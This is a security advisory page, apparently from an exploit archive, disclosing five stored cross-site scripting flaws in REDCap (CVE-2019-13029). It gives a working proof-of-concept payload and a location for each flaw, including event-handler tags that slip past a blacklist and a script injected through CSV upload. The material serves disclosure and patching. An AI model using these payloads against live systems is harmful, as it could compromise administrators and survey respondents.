REDCap Cross Site Scripting

2019.07.20
Credit: Dylan Garnaud
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting # Date: 2019-07-19 # Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France # Vendor Homepage: https://projectredcap.org # Software Link: https://projectredcap.org # Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2 # Tested on: 9.1.0 # CVE: CVE-2019-13029 # Security advisory: https://gitlab.com/snippets/1874216 ### Stored XSS n°1 – Project name (found by Dylan GARNAUD) Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it. - Where? In project name - Payload: `<BODY onKeyPress=alert("xss")>` - Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages. - Privileges: It requires admin privileges to store it. - Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified ### Stored XSS n°2 – Calendar (found by Dylan GARNAUD) - Where? Calendar event - Payload: `<BODY onKeyPress=alert("xss")>` - Privileges: It requires admin privileges to store it. - Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12 ### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD) - Where? Wherever there is a CSV upload feature with displayed parsed results - Payload: ```csv record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete <script>alert("upload xss")</script>,, ``` - Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered. - Privileges: It requires admin privileges to store it. - URL examples of execution: + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16 ### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI) - Where? In the Survey Queue (choose a Projet > Project Home and Design > Design > Survey Queue) - Payload: `</textarea><svg/onload='alert("XSS survey queue")'>` - Privileges: It requires admin privileges to store it. - Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Design/online_designer.php?pid=16 ### Stored XSS n°5 – Survey (found by Alexandre ZANNI) - Where? In the survey management system. + Store: One has to select a project, go in the *Designer* section, choose *Survey Settings* and then store the payload in the WYSIWYG editor section named *Survey Instructions* (the same happens for *Survey Completion Text*). + Execute: Anyone who consults the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, will trigger the XSS. - Payload: ```html <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert('Survey XSS')</SCRIPT>"></BODY></HTML> ``` - Privileges: + Store: It requires admin privileges to store it. + Execute: Any unauthenticated user that can consult a survey.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top